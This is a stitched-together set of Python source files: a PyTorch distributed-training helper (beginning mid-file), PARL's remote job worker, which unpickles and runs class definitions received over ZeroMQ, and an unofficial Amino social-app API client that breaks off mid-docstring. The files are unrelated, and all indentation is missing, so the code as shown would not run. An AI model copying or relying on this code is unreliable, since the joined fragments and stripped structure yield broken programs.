def __init__(self, module, device_ids, output_device):
super(DDP, self).__init__(module, device_ids=device_ids, output_device=output_device)
def __getattr__(self, name: str):
if '_parameters' in self.__dict__:
_parameters = self.__dict__['_parameters']
if name in _parameters:
return _parameters[name]
if '_buffers' in self.__dict__:
_buffers = self.__dict__['_buffers']
if name in _buffers:
return _buffers[name]
if '_modules' in self.__dict__:
modules = self.__dict__['_modules']
if name in modules:
return modules[name]
if hasattr(self, 'module'):
if hasattr(self.module, name):
return getattr(self.module, name)
raise AttributeError("'{}' object has no attribute '{}'".format(type(self).__name__, name))
else:
from apex import parallel
class DDP(parallel.DistributedDataParallel):
def __init__(self, module, delay_allreduce):
super(DDP, self).__init__(module, delay_allreduce=delay_allreduce)
def __getattr__(self, name: str):
if '_parameters' in self.__dict__:
_parameters = self.__dict__['_parameters']
if name in _parameters:
return _parameters[name]
if '_buffers' in self.__dict__:
_buffers = self.__dict__['_buffers']
if name in _buffers:
return _buffers[name]
if '_modules' in self.__dict__:
modules = self.__dict__['_modules']
if name in modules:
return modules[name]
if hasattr(self, 'module'):
if hasattr(self.module, name):
return getattr(self.module, name)
raise AttributeError("'{}' object has no attribute '{}'".format(type(self).__name__, name))
# DDP = parallel.DistributedDataParallel
class Multiverse(object):
'''
Args:
nworld: world size
'''
def __init__(self, universe, nworld=1):
self.universe = universe
self.nworld = nworld
self.rank = -1
self.env = os.environ.copy()
self.env["MASTER_ADDR"] = '127.0.0.1'
self.env["MASTER_PORT"] = '29500'
self.env["WORLD_SIZE"] = str(nworld)
self.env["OMP_NUM_THREADS"] = '1'
def __call__(self):
# mp.set_start_method('spawn')
ps = []
for r in range(self.nworld):
self.rank = r
self.env['RANK'] = str(r)
self.env['LOCAL_RANK'] = str(r)
p = mp.Process(target=self.universe, args=(self,))
p.start()
ps.append(p)
for p in ps:
p.join()
def init(self):
for k, v in self.env.items():
os.environ[k] = v
def scope(self):
class _VirtualScope():
def __init__(self):
pass
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
return _VirtualScope()
def Executor(self, func):
def _execWrapper(*args, **kwargs):
return func(*args, **kwargs)
return _execWrapper
def _sync(self, model):
scope = model.scope
if is_new_version:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
model = model.to(torch.device('cuda:%d' % self.rank))
model = DDP(model, device_ids=[self.rank], output_device=self.rank)
else:
model = parallel.convert_syncbn_model(model)
model = model.to(torch.device('cuda:%d' % self.rank))
model = DDP(model, delay_allreduce=True)
def gear(self, gr):
if isinstance(gr, bool):
if gr:
self.train()
else:
self.eval()
else:
raise Exception('NEBULAE ERROR ⨷ %s is not a valid type of collected gear.' % type(gr))
model.gear = MethodType(gear, model)
model.scope = scope
return model
def sync(self, models, data):
if not isinstance(models, (list, tuple)):
models = (models,)
if not isinstance(data, (list, tuple)):
data = (data,)
synced_md = []
for m in models:
synced_md.append(self._sync(m))
return tuple(synced_md) + tuple(data)
def reduce(self, tensor, aggregate=False):
rt = tensor.clone()
torch.distributed.all_reduce(rt, op=torch.distributed.ReduceOp.SUM)
if not aggregate:
rt /= self.nworld
return rt
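# --- Illustrative usage sketch (added for clarity; not part of the original module) ---
# Based only on the code above: the callable handed to Multiverse receives the
# Multiverse instance itself, calls init() to export the distributed environment
# variables, wraps its model via sync(), and averages values across workers with
# reduce(). The tiny model below is hypothetical, and the explicit
# init_process_group() call stands in for whatever the surrounding nebulae engine
# normally does to set up the process group.
if __name__ == '__main__':
    def universe(mv):
        mv.init()                                             # export MASTER_ADDR, RANK, LOCAL_RANK, ...
        torch.distributed.init_process_group(backend='nccl')  # assumed to be handled by the engine elsewhere
        net = torch.nn.Linear(8, 2)                           # hypothetical model
        net.scope = None                                      # _sync() reads a .scope attribute
        net, = mv.sync(net, ())                               # SyncBN conversion + DDP wrapping
        x = torch.randn(4, 8, device='cuda:%d' % mv.rank)
        loss = net(x).mean()
        print('rank %d, mean loss %.4f' % (mv.rank, mv.reduce(loss.detach()).item()))

    Multiverse(universe, nworld=2)()                          # spawn two worker processes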
|
job.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
os.environ['CUDA_VISIBLE_DEVICES'] = ''
os.environ['XPARL'] = 'True'
import argparse
import cloudpickle
import pickle
import psutil
import re
import sys
import tempfile
import threading
import time
import traceback
import zmq
from parl.utils import to_str, to_byte, get_ip_address, logger
from parl.utils.communication import loads_argument, loads_return,\
dumps_argument, dumps_return
from parl.remote import remote_constants
from parl.utils.exceptions import SerializeError, DeserializeError
from parl.remote.message import InitializedJob
class Job(object):
"""Base class for the job.
After establishing connection with the remote object, the job will
create a remote class instance locally and enter an infinite loop,
waiting for commands from the remote object.
"""
def __init__(self, worker_address):
"""
Args:
worker_address (str): address of the worker to which job information (e.g., pid) is sent
Attributes:
pid (int): Job process ID.
max_memory (float): Maximum memory (MB) can be used by each remote instance.
"""
self.job_is_alive = True
self.worker_address = worker_address
self.pid = os.getpid()
self.max_memory = None
self.lock = threading.Lock()
self._create_sockets()
process = psutil.Process(self.pid)
self.init_memory = float(process.memory_info()[0]) / (1024**2)
def _create_sockets(self):
"""Create three sockets for each job.
(1) reply_socket (main socket): receives the command (i.e., the function name and args)
from the actual class instance, completes the computation, and returns the result of
the function.
(2) job_socket(functional socket): sends job_address and heartbeat_address to worker.
(3) kill_job_socket: sends a command to the corresponding worker to kill the job.
"""
self.ctx = zmq.Context()
# create the reply_socket
self.reply_socket = self.ctx.socket(zmq.REP)
job_port = self.reply_socket.bind_to_random_port(addr="tcp://*")
self.reply_socket.linger = 0
self.job_ip = get_ip_address()
self.job_address = "{}:{}".format(self.job_ip, job_port)
# create the job_socket
self.job_socket = self.ctx.socket(zmq.REQ)
self.job_socket.connect("tcp://{}".format(self.worker_address))
# a thread that replies to ping signals from the client
ping_heartbeat_socket, ping_heartbeat_address = self._create_heartbeat_server(
timeout=False)
ping_thread = threading.Thread(
target=self._reply_ping, args=(ping_heartbeat_socket, ))
ping_thread.setDaemon(True)
ping_thread.start()
self.ping_heartbeat_address = ping_heartbeat_address
# a thread that replies to heartbeat signals from the worker
worker_heartbeat_socket, worker_heartbeat_address = self._create_heartbeat_server(
)
worker_thread = threading.Thread(
target=self._reply_worker_heartbeat,
args=(worker_heartbeat_socket, ))
worker_thread.setDaemon(True)
# a thread that replies to heartbeat signals from the client
client_heartbeat_socket, client_heartbeat_address = self._create_heartbeat_server(
)
self.client_thread = threading.Thread(
target=self._reply_client_heartbeat,
args=(client_heartbeat_socket, ))
self.client_thread.setDaemon(True)
# sends job information to the worker
initialized_job = InitializedJob(
self.job_address, worker_heartbeat_address,
client_heartbeat_address, self.ping_heartbeat_address, None,
self.pid)
self.job_socket.send_multipart(
[remote_constants.NORMAL_TAG,
cloudpickle.dumps(initialized_job)])
message = self.job_socket.recv_multipart()
worker_thread.start()
tag = message[0]
assert tag == remote_constants.NORMAL_TAG
# create the kill_job_socket
kill_job_address = to_str(message[1])
self.kill_job_socket = self.ctx.socket(zmq.REQ)
self.kill_job_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_TIMEOUT_S * 1000)
self.kill_job_socket.connect("tcp://{}".format(kill_job_address))
def _check_used_memory(self):
"""Check if the memory used by this job exceeds self.max_memory."""
stop_job = False
if self.max_memory is not None:
process = psutil.Process(self.pid)
used_memory = float(process.memory_info()[0]) / (1024**2)
if used_memory > self.max_memory + self.init_memory:
stop_job = True
return stop_job
def _reply_ping(self, socket):
"""Create a socket server that reply the ping signal from client.
This signal is used to make sure that the job is still alive.
"""
while self.job_is_alive:
message = socket.recv_multipart()
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
socket.close(0)
def _create_heartbeat_server(self, timeout=True):
"""Create a socket server that will raises timeout exception.
"""
heartbeat_socket = self.ctx.socket(zmq.REP)
if timeout:
heartbeat_socket.setsockopt(
zmq.RCVTIMEO, remote_constants.HEARTBEAT_RCVTIMEO_S * 1000)
heartbeat_socket.linger = 0
heartbeat_port = heartbeat_socket.bind_to_random_port(addr="tcp://*")
heartbeat_address = "{}:{}".format(self.job_ip, heartbeat_port)
return heartbeat_socket, heartbeat_address
def _reply_client_heartbeat(self, socket):
"""Create a socket that replies heartbeat signals from the client.
If the job loses connection with the client, it will exit too.
"""
self.client_is_alive = True
while self.client_is_alive and self.job_is_alive:
try:
message = socket.recv_multipart()
stop_job = self._check_used_memory()
socket.send_multipart([
remote_constants.HEARTBEAT_TAG,
to_byte(str(stop_job)),
to_byte(self.job_address)
])
if stop_job == True:
logger.error(
"Memory used by this job exceeds {}. This job will exist."
.format(self.max_memory))
time.sleep(5)
socket.close(0)
os._exit(1)
except zmq.error.Again as e:
logger.warning(
"[Job] Cannot connect to the client. This job will exit and inform the worker."
)
self.client_is_alive = False
socket.close(0)
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
logger.warning("[Job]lost connection with the client, will exit")
os._exit(1)
def _reply_worker_heartbeat(self, socket):
"""create a socket that replies heartbeat signals from the worker.
If the worker has exited, the job will exit automatically.
"""
self.worker_is_alive = True
# a flag to decide when to exit heartbeat loop
while self.worker_is_alive and self.job_is_alive:
try:
message = socket.recv_multipart()
socket.send_multipart([remote_constants.HEARTBEAT_TAG])
except zmq.error.Again as e:
logger.warning("[Job] Cannot connect to the worker{}. ".format(
self.worker_address) + "Job will quit.")
self.worker_is_alive = False
self.job_is_alive = False
socket.close(0)
os._exit(1)
def wait_for_files(self):
"""Wait for python files from remote object.
When a remote object receives the allocated job address, it will send
the python files to the job. Later, the job will save these files to a
temporary directory and add that directory to Python's module search
path.
Returns:
A temporary directory containing the python files.
"""
while True:
message = self.reply_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.SEND_FILE_TAG:
pyfiles = pickle.loads(message[1])
envdir = tempfile.mkdtemp()
for file in pyfiles:
code = pyfiles[file]
file = os.path.join(envdir, file)
with open(file, 'wb') as code_file:
code_file.write(code)
self.reply_socket.send_multipart([remote_constants.NORMAL_TAG])
return envdir
else:
logger.error("NotImplementedError:{}, received tag:{}".format(
self.job_address, ))
raise NotImplementedError
def wait_for_connection(self):
"""Wait for connection from the remote object.
The remote object will send its class information and initialization
arguments to the job, these parameters are then used to create a
local instance in the job process.
Returns:
A local instance of the remote class object.
"""
message = self.reply_socket.recv_multipart()
tag = message[0]
obj = None
if tag == remote_constants.INIT_OBJECT_TAG:
try:
cls = cloudpickle.loads(message[1])
args, kwargs = cloudpickle.loads(message[2])
max_memory = to_str(message[3])
if max_memory != 'None':
self.max_memory = float(max_memory)
obj = cls(*args, **kwargs)
except Exception as e:
traceback_str = str(traceback.format_exc())
error_str = str(e)
logger.error("traceback:\n{}".format(traceback_str))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" + traceback_str)
])
self.client_is_alive = False
return None
self.reply_socket.send_multipart([remote_constants.NORMAL_TAG])
else:
logger.error("Message from job {}".format(message))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
b"[job]Unkonwn tag when tried to receive the class definition"
])
raise NotImplementedError
return obj
def run(self):
"""An infinite loop waiting for a new task.
"""
# receive source code from the actor and add its directory to the module search path.
envdir = self.wait_for_files()
sys.path.append(envdir)
self.client_is_alive = True
self.client_thread.start()
try:
obj = self.wait_for_connection()
assert obj is not None
self.single_task(obj)
except Exception as e:
logger.error(
"Error occurs when running a single task. We will reset this job. Reason:{}"
.format(e))
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
with self.lock:
self.kill_job_socket.send_multipart(
[remote_constants.KILLJOB_TAG,
to_byte(self.job_address)])
try:
_ = self.kill_job_socket.recv_multipart()
except zmq.error.Again as e:
pass
os._exit(1)
def single_task(self, obj):
"""An infinite loop waiting for commands from the remote object.
Each job will receive two kinds of message from the remote object:
1. When the remote object calls a function, job will run the
function on the local instance and return the results to the
remote object.
2. When the remote object is deleted, the job will quit and release
related computation resources.
"""
while self.job_is_alive and self.client_is_alive:
message = self.reply_socket.recv_multipart()
tag = message[0]
if tag == remote_constants.CALL_TAG:
try:
function_name = to_str(message[1])
data = message[2]
args, kwargs = loads_argument(data)
ret = getattr(obj, function_name)(*args, **kwargs)
ret = dumps_return(ret)
self.reply_socket.send_multipart(
[remote_constants.NORMAL_TAG, ret])
except Exception as e:
# reset the job
self.client_is_alive = False
error_str = str(e)
logger.error(error_str)
if type(e) == AttributeError:
self.reply_socket.send_multipart([
remote_constants.ATTRIBUTE_EXCEPTION_TAG,
to_byte(error_str)
])
raise AttributeError
elif type(e) == SerializeError:
self.reply_socket.send_multipart([
remote_constants.SERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise SerializeError
elif type(e) == DeserializeError:
self.reply_socket.send_multipart([
remote_constants.DESERIALIZE_EXCEPTION_TAG,
to_byte(error_str)
])
raise DeserializeError
else:
traceback_str = str(traceback.format_exc())
logger.error("traceback:\n{}".format(traceback_str))
self.reply_socket.send_multipart([
remote_constants.EXCEPTION_TAG,
to_byte(error_str + "\ntraceback:\n" +
traceback_str)
])
break
# receive KILLJOB_TAG from the actor and stop serving this client
elif tag == remote_constants.KILLJOB_TAG:
self.reply_socket.send_multipart([remote_constants.NORMAL_TAG])
self.client_is_alive = False
logger.warning(
"An actor exits and this job {} will exit.".format(
self.job_address))
break
else:
logger.error(
"The job receives an unknown message: {}".format(message))
raise NotImplementedError
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--worker_address", required=True, type=str, help="worker_address")
args = parser.parse_args()
job = Job(args.worker_address)
job.run()
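# Illustrative invocation (a sketch, not part of the original file). A worker process
# is expected to launch this script with its own address; the host/port below are
# hypothetical:
#
#   python job.py --worker_address 127.0.0.1:8010
#
# The job then connects back to that worker, reports its own addresses, and waits
# for a remote class definition to serve.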
|
client.py
|
import json
import base64
from zipfile import ZipFile
import requests
import threading
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO, Union
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import exceptions, headers, device, objects, helpers
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
self.api = "https://service.narvii.com/api/v1"
self.authenticated = False
self.configured = False
self.user_agent = device.user_agent
self.session = requests.Session()
if deviceId is not None: self.device_id = deviceId
else: self.device_id = device.device_id
SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
Callbacks.__init__(self, self)
self.proxies = proxies
self.certificatePath = certificatePath
self.json = None
self.sid = None
self.userId = None
self.account: objects.UserProfile = objects.UserProfile(None)
self.profile: objects.UserProfile = objects.UserProfile(None)
def parse_headers(self, data = None):
if data:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def run_vc(self, comId: str, chatId: str, joinType: str):
while self.active:
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
sleep(1)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType]).start()
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def start_video(self, comId: str, chatId: str, path: str, title: str, background: BinaryIO, duration: int):
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 1,
"id": "10335106"
},
"t": 112
}
self.send(json.dumps(data))
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"channelType": 5,
"id": "10335436"
},
"t": 108
}
self.send(json.dumps(data))
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"playlist": {
"currentItemIndex": 0,
"currentItemStatus": 1,
"items": [{
"author": None,
"duration": duration,
"isDone": False,
"mediaList": [[100, self.upload_media(background, "image"), None]],
"title": title,
"type": 1,
"url": f"file://{path}"
}]
},
"id": "3423239"
},
"t": 120
}
self.send(json.dumps(data))
sleep(2)
data["o"]["playlist"]["currentItemStatus"] = 2
data["o"]["playlist"]["items"][0]["isDone"] = True
self.send(json.dumps(data))
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.run_amino_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_amino_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.run_amino_socket()
return response.status_code
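    # Illustrative usage sketch (added for clarity; not part of the original client).
    # Assumes the package is importable as `amino`; the credentials are placeholders.
    #
    #   import amino
    #   client = amino.Client()
    #   client.login(email="user@example.com", password="example-password")
    #   print(client.userId, client.sid)
    #
    # On success login() returns 200 and populates .sid, .userId, .account and .profile.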
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/register", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request a verification code for the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = self.session.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = self.session.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = self.session.get(f"{self.api}/g/s/account", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
- **file** : File to be uploaded.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = self.session.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = self.session.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
Information about a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from a Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
